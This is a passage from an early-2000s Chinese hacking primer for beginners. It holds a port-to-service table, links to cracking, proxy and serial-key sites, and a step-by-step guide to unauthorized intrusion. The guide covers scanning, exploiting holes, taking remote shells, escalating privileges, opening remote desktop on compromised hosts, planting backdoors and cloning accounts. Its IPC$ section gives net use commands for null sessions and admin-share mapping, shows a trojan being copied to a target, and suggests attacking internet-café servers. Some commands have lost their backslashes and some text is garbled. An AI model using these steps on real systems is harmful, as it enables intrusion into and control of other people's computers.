224=Reserved（224-241）

241=Reserved（224-241）

242=Unassigned#

243=SurveyMeasurement

244=Unassigned#

245=LINKlink

246=DisplaySystemsProtocol

247-255Reserved

256-343Unassigned

344=ProsperoDataAccessProtocol

345=PerfAnalysisWorkbench

346=Zebraserverzserv

347=FatmenServe**tserv

348=CabletronManagementProtocol

349-370Unassigned

371=Clearcaseclearcase

372=UnixListservulistserv

373=LegentCorporation

374=LegentCorporation

375=Hasslehassle

376=AmigaEnvoyNetworkInquiryProto

377=NECCorporation

378=NECCorporation

379=TIA/EIA/IS-99modemclient

380=TIA/EIA/IS-99modemserver

381=hpperformancedatacollector

382=hpperformancedatamanagednode

383=hpperformancedataalarmmanager

384=ARemoteNetworkServerSystem

385=IBMApplication

386=ASAMessageRouterObjectDef.

387=AppletalkUpdate-BasedRoutingPro.

388=UnidataLDMVersion4

389=LightweightDirectoryAccessProtocol

390=UISuis

391=SynOpticsSNMPRelayPort

392=SynOpticsPortBrokerPort

393=DataInterpretationSystem

394=EMBLNucleicDataTransfer

395=NETscoutControlProtocol

396=NovellNetwareoverIP

397=MultiProtocolTrans.Net.

398=Kryptolankryptolan

399=Unassigned#

400=WorkstationSolutions

401=UninterruptiblePowerSupply

402=GenieProtocol

403=decapdecap

404=ncednced

405=ncldncld

406=InteractiveMailSupportProtocol

407=Timbuktutimbuktu

408=ProsperoResourceManagerSys.Man.

409=ProsperoResourceManagerNodeMan.

410=DECLadebugRemoteDebugProtocol

411=RemoteMTProtocol

412=TrapConventionPort

413=**SPsmsp

414=InfoSeekinfoseek

415=BNetbnet

416=Silverplattersilverplatter

417=Onmuxonmux

418=Hyper-Ghyper-g

419=Arielariel1

420=**PTEsmpte

421=Arielariel2

422=Arielariel3

423=IBMOperationsPlanningandControlStart

424=IBMOperationsPlanningandControlTrack

425=ICADicad-el

426=smartsdpsmartsdp

427=ServerLocation

429=OCS_AMU

430=UTMPSDutmpsd

431=UTMPCDutmpcd

432=IASDiasd

433=NNSPnnsp

434=MobileIP-Agent

435=MobilIP-MN

436=DNA-CMLdna-cml

437=comscmcomscm

439=dasp,ThomasObermair

440=sgcpsgcp

441=decvms-sysmgtdecvms-sysmgt

442=cvc_hostdcvc_hostd

443=https

444=SimpleNetworkPagingProtocol

445=Microsoft-DS

446=DDM-RDBddm-rdb

447=DDM-RFMddm-dfm

448=DDM-BYTEddm-byte

449=ASServerMapper

450=TServertserver

512=exec,Remoteproces**ecution

513=login,remotelogin

514=cmd,execwithautoauth.

514=syslog

515=Printerspooler

516=Unassigned

517=talk

519=unixtime

520=extendedfilenameserver

521=Unassigned

522=Unassigned

523=Unassigned

524=Unassigned

526=newdate

530=rpccourier

 

(本章完)

[(第20章 端口详细说明表（下）)]

531=chatconference

532=readnewsnetnews

533=foremergencybroadcasts

539=ApertusTechnologiesLoadDetermination

540=uucp

541=uucp-rlogin

542=Unassigned

543=klogin

544=kshell

545=Unassigned

546=Unassigned

547=Unassigned

548=Unassigned

549=Unassigned

550=new-who

551=Unassigned

552=Unassigned

553=Unassigned

554=Unassigned

555=dsf

556=remotefs

557-559=rmonitor

560=rmonitord

561=dmonitor

562=chcmd

563=Unassigned

564=plan9fileservice

565=whoami

566-569Unassigned

570=demonmeter

571=udemonmeter

572-599Unassignedipcserver

600=SunIPCserver

607=nqs

606=CrayUnifiedResourceManager

608=Sender-Initiated/UnsolicitedFileTransfer

609=npmp-trapnpmp-trap

610=npmp-localnpmp-local

611=npmp-guinpmp-gui

634=ginadginad

666=DoomIdSoftware

704=errlogcopy/serverdaemon

709=EntrustManager

729=IBMNetViewDM/6000Server/Client

730=IBMNetViewDM/6000send/tcp

731=IBMNetViewDM/6000receive/tcp

741=netGWnetgw

742=NetworkbasedRev.Cont.Sys.

744=FlexibleLicenseManager

747=FujitsuDeviceControl

748=RussellInfoSciCalendarManager

749=kerberosadministration

751=pump

752=qrh

754=send

758=nlogin

759=con

760=ns

762=quotad

763=cycleserv

765=webster

767=phonephonebook

769=vid

771=rtip

772=cycleserv2

774=acmaint_dbd

775=acmaint_transd

780=wpgs

786=Concertconcert

800=mdbs_daemon

996=CentralPointSoftware

997=maitrd

999=puprouter

1023=Reserved

1024=Reserved

1025=networkblackjack

1030=BBNIAD

1031=BBNIAD

1032=BBNIAD

1067=InstallationBootstrapProto.Serv.

1068=InstallationBootstrapProto.Cli.

1080=SOCKS

1083=AnasoftLicenseManager

1084=AnasoftLicenseManager

1155=NetworkFileAccess

1222=SNIR&Dnetwork

1248=hermes

1346=AltaAnalyticsLicenseManager

1347=multimediaconferencing

1347=multimediaconferencing

1348=multimediaconferencing

1349=RegistrationNetworkProtocol

1350=RegistrationNetworkProtocol

1351=DigitalToolWorks（MIT）

1352=/LotusNotelotusnote

1353=ReliefConsulting

1354=RightBrainSoftware

1355=IntuitiveEdge

1356=CuillaMartinCompany

1357=ElectronicPegBoard

1358=CONNLCLIconnlcli

1359=FTSRVftsrv

1360=MIMERmimer

1361=LinX

1362=TimeFliestimeflies

1363=NetworkDataMoverRequester

1364=NetworkDataMoverServer

1365=NetworkSoftwareAssociates

1366=NovellNetWareCommServicePlatform

1367=DCSdcs

1368=ScreenCastscreencast

1369=GlobalViewtoUnixShell

1370=UnixShelltoGlobalView

1371=FujitsuConfigProtocol

1372=FujitsuConfigProtocol

1373=Chromagrafxchromagrafx

1374=EPISoftwareSystems

1375=Bytexbytex

1376=IBMPersontoPersonSoftware

1377=CichlidLicenseManager

1378=ElanLicenseManager

1379=IntegritySolutions

1380=TelesisNetworkLicenseManager

1381=AppleNetworkLicenseManager

1382=udt_os

1383=GWHannawayNetworkLicenseManager

1384=ObjectiveSolutionsLicenseManager

1385=AtexPublishingLicenseManager

1386=CheckSumLicenseManager

1387=ComputerAidedDesignSoftwareIncLM

1388=ObjectiveSolutionsDataBaseCache

1389=documentManager

1390=StorageController

1391=StorageAccessServer

1392=PrintManagericlpv-pm

1393=NetworkLogServer

1394=NetworkLogClient

1395=PCWorkstationManagersoftware

1396=DVLActiveMail

1397=AudioActiveMail

1398=VideoActiveMail

1399=CadkeyLicenseManager

1400=CadkeyTabletDaemon

1401=GoldleafLicenseManager

1402=ProsperoResourceManager

1403=ProsperoResourceManager

1404=InfiniteGraphicsLicenseManager

1405=IBMRemoteExecutionStarter

1406=NetLabsLicenseManager

1407=DBSALicenseManager

1408=SophiaLicenseManager

1409=HereLicenseManager

1410=HiQLicenseManager

1411=AudioFileaf

1412=InnoSysinnosys

1413=Innosys-ACLinnosys-acl

1414=IBMMQSeriesibm-mqseries

1415=DBStardbstar

1416=NovellLU6.2novell-lu6.2

1417=TimbuktuService1Port

1417=TimbuktuService1Port

1418=TimbuktuService2Port

1419=TimbuktuService3Port

1420=TimbuktuService4Port

1421=GandalfLicenseManager

1422=AutodeskLicenseManager

1423=EssbaseArborSoftware

1424=HybridEncryptionProtocol

1425=ZionSoftwareLicenseManager

1426=Satellite-dataAcquisitionSystem1

1427=mloaddmonitoringtool

1428=InformatikLicenseManager

1429=HypercomNMSnms

1430=HypercomTPDUtpdu

1431=ReverseGosipTransport

1432=BlueberrySoftwareLicenseManager

1433=Microsoft-SQL-Server

1434=Microsoft-SQL-Monitor

1435=IBMCISCibm-cics

1436=Satellite-dataAcquisitionSystem2

1437=Tabulatabula

1438=EiconSecurityAgent/Server

1439=EiconX25/SNAGateway

1440=EiconServiceLocationProtocol

1441=CadisLicenseManagement

1442=CadisLicenseManagement

1443=IntegratedEngineeringSoftware

1444=MarcamLicenseManagement

1445=ProximaLicenseManager

1446=OpticalResearchAssociatesLicenseManager

1447=AppliedParallelResearchLM

1448=OpenConnectLicenseManager

1449=PEportpeport

1450=TandemDistributedWorkbenchFacility

1451=IBMInformationManagement

1452=GTEGovernmentSystemsLicenseMan

1453=GenieLicenseManager

1454=interHDLLicenseManager

1454=interHDLLicenseManager

1455=ESLLicenseManager

1456=DCAdca

1457=ValisysLicenseManager

1458=NicholsResearchCorp.

1459=ProshareNotebookApplication

1460=ProshareNotebookApplication

1461=IBMWirelessLAN

1462=WorldLicenseManager

1463=Nucleusnucleus

1464=MSLLicenseManager

1465=PipesPlatform

1466=OceanSoftwareLicenseManager

1467=CSDMBASEcsdmbase

1468=CSDMcsdm

1469=ActiveAnalysisLimitedLicenseManager

1470=UniversalAnalytics

1471=csdmbasecsdmbase

1472=csdmcsdm

1473=OpenMathopenmath

1474=Telefindertelefinder

1475=TaligentLicenseManager

1476=clvm-cfgclvm-cfg

1477=ms-sna-server

1478=ms-sna-base

1479=dberegisterdberegister

1480=PacerForumpacerforum

1481=AIRSairs

1482=MiteksysLicenseManager

1483=AFSLicenseManager

1484=ConfluentLicenseManager

1485=LANSourcelansource

1486=nms_topo_serv

1487=LocalInfoSrvr

1488=DocStordocstor

1489=dmdocbrokerdmdocbroker

1490=insitu-confinsitu-conf

1491=anynetgateway

1492=stone-design-1

1493=netmap_lmnetmap_lm

1494=icaica

1495=cvccvc

1496=liberty-lmliberty-lm

1497=rfx-lmrfx-lm

1498=Watcom-SQLwatcom-sql

1499=FedericoHeinzConsultora

1500=VLSILicenseManager

1501=Satellite-dataAcquisitionSystem3

1502=Shivashivadiscovery

1503=Databeamimtc-mcs

1504=EvbsoftwareEngineeringLicenseManager

1505=FunkSoftware,Inc.

1524=ingres

1525=oracle

1525=ProsperoDirectoryServicenon-priv

1526=ProsperoDataAccessProtnon-priv

1527=oracletlisrv

1529=oraclecoauthor

1600=issd

1651=proshareconfaudio

1652=proshareconfvideo

1653=proshareconfdata

1654=proshareconfrequest

1655=proshareconfnotify

1661=netview-aix-1netview-aix-1

1662=netview-aix-2netview-aix-2

1663=netview-aix-3netview-aix-3

1664=netview-aix-4netview-aix-4

1665=netview-aix-5netview-aix-5

1666=netview-aix-6netview-aix-6

1986=ciscolicensemanagement

1987=ciscoRSRBPriority1port

1988=ciscoRSRBPriority2port

1989=ciscoRSRBPriority3port

1989=MHSnetsystemmshnet

1990=ciscoSTUNPriority1port

1991=ciscoSTUNPriority2port

1992=ciscoSTUNPriority3port

1992=IPsendmsgipsendmsg

1993=ciscoSNMPTCPport

1994=ciscoserialtunnelport

1995=ciscoperfport

1996=ciscoRemoteSRBport

1997=ciscoGatewayDiscoveryProtocol

1998=ciscoX.25service（XOT）

1999=ciscoidentificationport

2009=whosockami

2010=pipe_server

2011=raid

2012=raid-ac

2013=rad-am

2015=raid-cs

2016=bootserver

2017=terminaldb

2018=rellpack

2019=about

2019=xinupageserver

2020=xinupageserver

2021=xinuexpansion1

2021=down

2022=xinuexpansion2

2023=xinuexpansion3

2023=xinuexpansion4

2024=xinuexpansion4

2025=xribs

2026=scrabble

2027=shadowserver

2028=submitserver

2039=device2

2032=blackboard

2033=glogger

2034=scoremgr

2035=imsldoc

2038=objectmanager

2040=lam

2041=interbase

2042=isis

2043=isis-bcast

2044=primsl

2045=cdfunc

2047=dls

2048=dls-monitor

2065=DataLintchReadPortNumber

2067=DataLintchWritePortNumber

2201=AdvancedTrainingSystemProgram

2500=ResourceTrackingsystemserver

2501=ResourceTrackingsystemclient

2564=HP3000NS/VTblockmodetelnet

2784=worldwideweb-development

3049=ccmail

3264=ccmail,cc:mail/lotus

3333=dec-notes

3984=MAPPERnetworknodemanager

3985=MAPPERTCP/IPserver

3986=MAPPERworkstationserver

3421=BullAppriseportmapper

3900=UnidataUDTOS

4132=NUTSDaemonnuts_dem

4133=NUTSBootpServer

4343=UNICALL

4444=KRB524

4672=remotefileaccessserver

5002=radiofreeethernet

5010=TelepathStarttelelpathstart

5011=TelepathAttack

5050=multimediaconferencecontroltool

5145=rmonitor_secure

5190=aol,America-Online

5300=HAclusterheartbeat

5301=hacl-gs#HAclustergeneralservices

5302=HAclusterconfiguration

5303=hacl-probeHAclusterprobing

5305=hacl-test

6000-6063=x11XWindowSystem

6111=sub-processHPSoftBenchSub-ProcessControl

6141/=meta-corpMetaCorporationLicenseManager

6142=aspentec-lmAspenTechnologyLicenseManager

6143=watershed-lmWatershedLicenseManager

6144=statsci1-lmStatSciLicenseManager-1

6145=statsci2-lmStatSciLicenseManager-2

6146=lonewolf-lmLoneWolfSystemsLicenseManager

6147=montage-lmMontageLicenseManager

7000=afs3-fileserverfileserveritself

7001=afs3-callbackcallbackstocachemanagers

7002=afs3-prserverusers&groupsdatabase

7003=afs3-vlservervolumelocationdatabase

7004=afs3-kaserverAFS/Kerberosauthenticationservice

7005=afs3-volservolumemanagmentserver

7006=afs3-errorserrorinterpretationservice

7007=afs3-bosbasicoverseerprocess

7008=afs3-updateserver-to-serverupdater

7009=afs3-rmtsysremotecachemanagerservice

7010=ups-onlineonlinetuninterruptablepowersupplies

7100=XFontService

7200=FODMSFLIP

7626=冰河

8010=Wingate

8181=IMail

9535=man

45576=E代时光专业代理端口

 

(本章完)

[(第21章 org菜鸟进阶（1）)]

常用类软件：

黑白屋： http://www.play8.net/

华军软件 http://www.newhua.com/ （根据物理位置自行选择速度快的镜像）

中国下载 http://download.com.cn/ （使用查找功能可找到大部份软件）

东丽在线 http://www.tjdl.net/softdown/ （不错的软件下载站，类似华军）

世纪下载 http://www.21sx.com/ （也是一个不错的下载站）

安全类软件：

黑白屋：http://www.play8.net/index2.htm

安全焦点 http://www.xfocus.net/tool.php

安全资讯 http://www.aurorasafe.com/list.asp

天天安全 http://www.ttian.net/download/list.php

网嗅下载 http://netsill.com/download/default.asp

灰色轨迹 http://www.sandflee.net/down/list.asp

鹰派下载 http://211.155.27.112/~technic/down/

（一些大型精典安全软件下载，不过有时候就上不去）

校园黑客联盟 http://www.schoolhacker.com

（这两天要推出软件下载专栏,即将有一套崭新的下载程序,大家尽请关注!!）

找代理在这里：

代理使用方法 http://extend.hk.hi.cn/~sunbird/freeproxy_why.html

（各种代理使用方法介绍）

代理服务器地址 http://www.salala.com/proxy_index.htm

（每日更新的，大部份是HTTP代理）

代理服务器地址 http://www.emaga.net/8341/myann

（每日更新的，大部份是SOCKS代理，既QQ代理）

注册码在这里：

第六空间 http://www.sixthroom.com/down/qt/ser.rar （注册码大全下载）

注册码搜索 http://www.netpaste.com/code/

孤月注册码 http://www.guyue.com/key/

 

(本章完)

[(第22章 菜鸟进阶（2）)]

关于被入侵

简单说明：

经常有帖子说：”我中木马啦，怎么办？”、”我被攻击了”，”我的windows有问题，是不是被入侵啦？”等等。哪么如果你怀疑系统被入侵的话，请你首先看看日志的记录或是有什么变化，然后你应该查看可疑进程（win98需要用相关工具）、注册表启动项、服务、开放端口等，然后更新病毒库，杀毒。前提是你要有一定的电脑常识并对你的系统比较了解，才能分别正常与否。如果你自己对电脑一窍不通，那在论坛别人也很难帮助你。其实就像对付现实中的病毒一样，应该预防为主。杀毒软件和网络防火墙可以抵御绝大部分危险，自身安全知识的提高则是最根本的保障。最新的病毒相关知识可以到杀毒软件公司的主页上找。另外，系统不正常也可能是操作失误引起的。这里不是”电脑零起点”，所以关于系统修复的问题，请不要在论坛提了。

相关工具：

Active Ports 监视自己电脑的端口，并做出相应处理。http://www.sixthroom.com/down/aq/cn_aports.rar

windows优化大师5.1 它的进程管理功能不错。更是目前最好的系统优化软件。 http://www.sixthroom.com/down/aq/wom.rar

Windows 基准安全分析器 1.0 （特别推荐，详细资料看下载说明吧）

http://www.sixthroom.com/down/admin/aq/mbsasetup.msi

Fport-2.0 查看端口关联的进程 （应用于9x/me）http://www.sixthroom.com/down/admin/aq/fport.zip

mport 比fport更胜一筹的工具 http://www.sixthroom.com/down/admin/aq/mport.zip

KV3000江民杀毒王（正式版＋钥匙盘）

http://www.kxweb.net/down/down.asp?downid=1&id=14

金山毒霸2003正式版

http://www.kxweb.net/down/down.asp?downid=1&id=11

相关资料：

黑白屋文档中心：http://www.play8.net/cgi-bin/news/article/list.cgi

104种木马的清除方法http://asp2.6to23.com/ebug88/net/article/net004.htm

清除恶意网页的破坏 http://assistant.3721.com/safe.htm

2000系统进程总列表 http://sinbad.zhoubin.com/read.html?board=Win&num=73

木马的检测、清除及其预防 天网安全检测 http://sky.net.cn/main/view.php?cid=170

蓝盾安全检测 http://www.bluedon.com/bluedonserver.asp

校园黑客联盟 http://www.schoolhacker.com

 

(本章完)

[(第23章 菜鸟进阶（3）)]

基础知识和入侵步骤

简单说明：

电脑和网络知识可算是做黑客的基础的基础，至少你要先了解了它们再来看下面的文章。看完这部分的文章，你也只是算站到了门口，路还长着呢。这里我再多说几句关于入侵步骤的话，给新手做个引导。所谓入侵，可以理解为未授权的访问。既然是未授权的，就需要借助一些非常规的手段，即通常所说的利用漏洞。

基础知识网址：

http://tech.163.com/tm/010213/010213_14563.html

http://tech.163.com/tm/010213/010213_14564.html

http://tech.163.com/tm/010214/010214_14632.html

http://tech.163.com/tm/010214/010214_14634.html

http://tech.163.com/tm/010214/010214_14638.html

一、要利用漏洞首先要发现它。端口扫描和漏洞扫描就是”敲门砖”。可以对大量目标做一般扫描，也可以对单一目标做重点扫描。或者两者结合。当你对漏洞熟悉时，你可以只通过端口扫描就能了解目标的可能有的漏洞。这样既提高效率又不易被记录日志。

几种扫描器的简单使用教程：http://www.chinesehack.org/file/show.asp?id=5614

入侵技术介绍–目标探测：http://www.sixthroom.com/ailan/f … 2&RootID=279&ID=279

二、找到漏洞后的利用问题，是千差万别的。这正是新手学要学习的地方之一。很多要依靠自己的知识积累及对系统的掌握及熟悉程度，这里就不多说了。 下面提供几个提供漏洞资料的网站供大家参考。

天极网 http://www.myhard.com/76284138209935360/index.shtml

绿盟科技 http://www.nsfocus.net/index.php?act=sec_bug

五月安全网 http://bgbbs.www70.cn4e.com/article.asp?cat_id=2

中国信息安全 http://www.chinafirst.org.cn/ruodian/advisory.php

三、利用漏洞的目的是什么呢？是控制对方，即是获得远程shell。shell这个概念是从UNIX下继承过来的，是指与操作系统核心的一种交互方式和界面。典型的例子是telnet。得到shell的办法有很多种，比如通过系统自带的telnet，终端服务。或者用木马和工具提供的，如winshell，冰河等等。以下介绍两篇SHELL编程的文章给大家。

中国软件 http://www.csdn.net/develop/article/14/14219.shtm

程序春秋 http://www.cbinews.com/developer/showconte…?articleid=2193

四、shell是有权限差别的。最高权限–管理员权限才是我们的目标。所以有时会有提升权限的问题。当然，这也是利用了漏洞。以下介绍几篇文章。

Win2K 提升权限漏洞

http://www.yesky.com/20010530/182273.shtml

Microsoft SQL Server Webtasks权限提升漏洞

http://it.rising.com.cn/newSite/ … 10/31-153502052.htm

Linux kernel ptrace提升权限漏洞

http://levinstorm.myetang.com/main/holes/unix/005.html

NT/2000提升权限的方法小结

http://home.lufeng.net/wolf/Computer/luodong/2000tisheng.htm

IIS提升权限漏洞

http://www.ddhome.net/hole/14.htm

五、有了shell还要扩大它，就是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是才有了”怎么开3389″，”怎么上传”之类问题。在这介绍给大家介绍一下现在最流行的3389吧。更多的文章请www.sixthroom.com。

远程开启3389终端服务

http://www.sandflee.net/wawa/3389-1.htm

建立你的3389肉鸡

http://www.sandflee.net/wawa/sz-3389.htm

六、为了下次还能控制目标，你需要保持shell。做一个好的后门又是一种”学问”。克隆帐号、埋木马、破administrator的密码，手段不一而足。各位慢慢学吧。

永远的后门 http://www.ttian.net/article/show.php?id=259

Win2000 下Ping 后门的简单实现

http://www.landun.org/wenzhang/images/xiao…rticle/154.html

帐号克隆

http://www.netXeyes.org/CA.exe

帐号检查

http://www.netXeyes.org/CCA.exe

暴力破解LC4

http://www.andyxu.net/banana/tools_2/lc4.rar

端口知识介绍：

相关工具：

扫描端口是扫描器的基本功能，工具太多了。提供两个给大家，更多的参看后面。

X-Port.zip下载 http://www.xfocus.net/download.php?id=327

PortReady下载 http://dotpot.533.net/dpsoft/PortReady1.6.zip

相关资料：

端口扫描简介 http://www.netscreen.com.cn/suml/zhishiyy/…/duankougj.htm0

系统服务及木马默认端口表

http://www.pttc.yn.cninfo.net/dtsy/nettech…an/41250634.htm

端口大全 http://www.sixthroom.com/ailan/f … 2&RootID=268&ID=268

常用默认端口列表及功能中文注解 http://www.sixthroom.com/ailan/f … 2&RootID=267&ID=267

常见端口详解及部分攻击策略 http://www.sixthroom.com/ailan/f … 2&RootID=266&ID=266

相关资料：

如何成为一名黑客 http://263.aka.org.cn/Docs/hacker-howto_2001.html

提问的技巧 http://bbs.online.sh.cn/eliteart … 44fb3b6efa4377e48ae

TCP/IP基础 http://www.linkwan.com/gb/routertech/netbase/tcpip.htm

网络攻防教程 http://www.netsill.com/wenzhang/list.asp?id=115

网络入侵步骤及思路 http://www.iamguo.com/bh3/hackguide2.htm

拒绝背后黑手的窥探 IPC$漏洞大揭秘

http://computer.szptt.net.cn/2002-04-27/nw…042700109.shtml

全球ip分配表 http://519519.vicp.net/lb5000//usr/3/3_11.txt

黑客入门教程 http://www.pttc.yn.cninfo.net/dtsy/nettech…an/43934529.htm

菜鸟XXX客快速入门

http://netsafe.ayinfo.ha.cn/sqxw/2002117172333.htm

几种流行的入侵工具与讲解

http://www.pttc.yn.cninfo.net/dtsy/nettech…an/44188520.htm

常见端口详解及部分攻击策略

http://www.pttc.yn.cninfo.net/dtsy/nettech…quan/-90637.htm

攻击的各种级别

http://www.pttc.yn.cninfo.net/dtsy/nettech…an/39825935.htm

 

(本章完)

[(第24章 菜鸟进阶（4）)]

关于命令的使用

简单说明：

windowsNT/2000下有丰富的cmd可供使用，其作用也是巨大的。完全值得去熟练掌握她它们。windows2000本身就提供了详细的命令帮助。在开始菜单–》帮助中可以搜索到”windows 2000 命令参考”。强烈建议各位新手花些时间仔细看一遍。装了比如IIS等软件，就会有新的命令（iisreset），在命令行方式下加/?或-h参数可以查看帮助，其他内置的命令当然也可以。还有就是掌握一些常用的DOS命令也是非常有必要的。因为WINSOWS不管发展到哪一天，它也都不可能取代DOS，至少现在还不行。NET命令更是最常用的网络命令，想做一个黑客，更是你所必需掌握的。掌握一些LINUX命令也是很有必要的。希望下面的资料对大家有所帮助。

相关帖子：

DOS下常用网络相关命令解释

http://www.jiejingwang.com/list.asp?id=521

入门网络命令

http://www.jiejingwang.com/list.asp?id=520

Win2000命令全集 http://www.sixthroom.com/ailan/f … 2&RootID=343&ID=343

Windows XP下cmd命令详解 http://www.sixthroom.com/ailan/f … 2&RootID=366&ID=366

ftp命令： http://www.hotcy.org/chem/campous/article/ftp.htm

telnet命令简介：http://www22.brinkster.com/lastknife/netbase/telnetorder.htm （以上地址简单介绍了TELNET命令，http://www.sixthroom.com/ailan/f … 2&RootID=277&ID=277

net命令基本用法：http://www.yy0730.com/1/1/1/wen/list.asp?id=12

tftp命令： 由于TFTP命令过于简单，请自行使用”TFTP /？”进行查询。下面在给出一个参照的

实例：http://levinstorm.myetang.com/main/tutorials/hacking/006.html

一般入侵所需要的几个常用命令：

http://www.yixindz.com/badschool/hacker/hack_commands.htm

Linux 的常用网络命令

http://www.jiejingwang.com/list.asp?id=522

 

(本章完)

[(第25章 菜鸟进阶（5）)]

关于windows98

简单说明：

这类问题有两种：一是怎样入侵win98系统，二是在win98怎样入侵。

由于98的网络功能并不完善，使得问题的解决远没有像对2000那样”丰富多采”。98默认没有什么网络服务启动，众所周知漏洞是由于各种服务的功能设计并不完美,所以才产生的,也就是说没有漏洞也就很难入侵,找不到什么可利用的漏洞。这给入侵带来的困难是难以想像的.共享入侵,算是最常见的攻击方式了。

相关资料:

共享入侵 http://www.sixthroom.com/ailan/f … 2&RootID=269&ID=269

入侵windows98系统 http://www.sixthroom.com/ailan/f … 2&RootID=270&ID=270

win98入侵网吧详解 http://www.sixthroom.com/ailan/f … 2&RootID=271&ID=271

其实还有些方法，比如嗅探密码、发病毒和木马到信箱、甚至用QQ”联络感情”再传个绑木马的Flash等，没什么意思，就此打住（这是前辈说的,他老人家都说打住了,哪我也打住，其实是我也不知道说什么，呵呵）。

基于同样的理由，98不是一个好的攻击平台。如果只是端口扫描，那么superscan可以胜任。web类的漏洞扫描x-scan也可以。但涉及ipc$的弱口令、漏洞、远程控制工具以及连接一些服务（如sql）就要”基于NT技术构建”的os了。好在3389终端服务的客户端可以是98，所以先搞一台开3389的肉鸡就算是回避了问题。如果你还在用98，诚恳的建议你：请用2000。如果你在网吧，先试试入侵网吧服务器。（在这里我也要加一句就是如果你是用98系统的话，哪么选择榕哥的流光98版也是不错的。不过有很多功能也还是无法使用）。

鉴于98的问题技术含量不高、没有深入探讨价值，所以就谈到这里吧。（个人观点）

相关工具：

NetPass 1.0 破解98共享密码 http://lovezxd.myetang.com/indexpage/indextool/NetPass.zip

cain v2.5 综合破解工具 http://www.qq888.com/down/download.asp?Did=968

exeBinderZ 1.3 EXE捆绑机 http://www.heibai.net/download/show.php?id=3028&down=3

SUPERSCAN3.0中文版下载 http://download.pchome.net/php/d … erscanv30.exe&svr=3

X-SCAN2.3下载 http://www.xfocus.net/download.php?id=366

流光98下载 http://www.netxeyes.com/cfluxay2k1for98set…妥约喝フ野桑?/a>

终端服务客户端 http://arm.533.net/hack/winterminal.zip （既3389连接器）

第6章——关于ipc$、空连接和默认共享

简单说明：

******首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话，换句话说，它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享，包含了所有的逻辑盘（c$,d$,e$……）和系统目录winnt或windows（admin$）。******个人认为这段很重要，因为很多人根本就不知道什么是空连接什么是IPC$.建议不知道的朋友仔细看一下吧.这种问题,不应该不知道的.

相关帖子：

拒绝背后黑手的窥探 IPC$漏洞大揭秘

http://www.sixthroom.com/ailan/f … 2&RootID=281&ID=281

IPC入侵全攻略 http://www.sixthroom.com/ailan/f … 2&RootID=278&ID=278

win2k中C驱等的默认共享是怎么回事

http://www.sixthroom.com/ailan/f … 2&RootID=282&ID=282

取消默认共享≠安全 http://js00.51.net/23/wudi/show. … p;id=20021017212524

常见问题和回答：

一、怎样建立空连接，它有什么用？

答：使用命令 net use \IPipc$ /user: 就可以简单地和目标建立一个空连接（需要目标开放ipc$）。

对于NT，在默认安全设置下，借助空连接可以列举目标用户、共享，访问everyone权限的共享，访问小部分注册表等，没有什么利用价值。对2000作用就更小了。而且实现也不方便，需借助工具。如果你不理解”没用”的东西为什么还会存在，就看看”专业”的解释吧：

在NT/2000下的空连接 http://www.sixthroom.com/ailan/f … 2&RootID=280&ID=280

解剖WIN2K下的空会话 http://www.sixthroom.com/ailan/f … 2&RootID=283&ID=283

二、为什么我连不上IPC$？

答：1，只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。

2、确认你的命令没有打错。正确的命令是： net use \目标IPipc$ 密码 /user:用户名

注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用表示。

3，根据返回的错误号分析原因：

错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；

错误号51，Windows 无法找到网络路径 : 网络有问题；

错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；

错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。

错误号1326，未知的用户名或错误密码 ： 原因很明显了；

错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动。（连接域控会出现此情况）

错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。

4，关于ipc$连不上的问题比较复杂，本论坛没有总结出一个统一的认识，我在肉鸡上实验有时会得出矛盾的结论，十分棘手。而且知道了问题所在，如果没有用其他办法获得shell，很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。各位看着办吧，呵呵。

三、怎样打开目标的IPC$？

答：首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马。当然，这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）。还是不行的话（比如有防火墙，杀不了）建议放弃。

四、怎样映射和访问默认共享？

答：使用命令net use z: \目标IPc$ 密码 /user:用户名 将对方的c盘映射为自己的z盘，其他盘类推。

如果已经和目标建立了ipc$，则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以，只是不用用户名和密码了：net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时，须用将路径全引住。

五、如何删除映射和ipc$连接？

答：用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。

用命令 net use z: /del 删除映射的z盘，其他盘类推。

用命令 net use * /del 删除全部。会有提示要求按y确认。

六、连上ipc$然后我能做什么？

答：能使用管理员权限的帐号成功和目标连接ipc$，表示你可以和对方系统做深入”交流”了。你可以使用各种命令行方式的工具（比如pstools系列、Win2000SrvReskit、telnethack等）获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享（没开你就帮他开），你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具（木马）还具有直接控屏的功能。如果是2000server，还可以考虑开启终端服务方便控制。这里提到的工具的使用，请看自带的说明或相关教程。

七、怎样防止别人用ips$和默认共享入侵我？

答：A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。

1，先把已有的删除

net share ipc$ /del

net share admin$ /del

net share c$ /del

…………（有几个删几个）

2，禁止建立空连接

  首先运行regedit，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous（DWORD）的键值改为：00000001。

  3，禁止自动打开默认共享

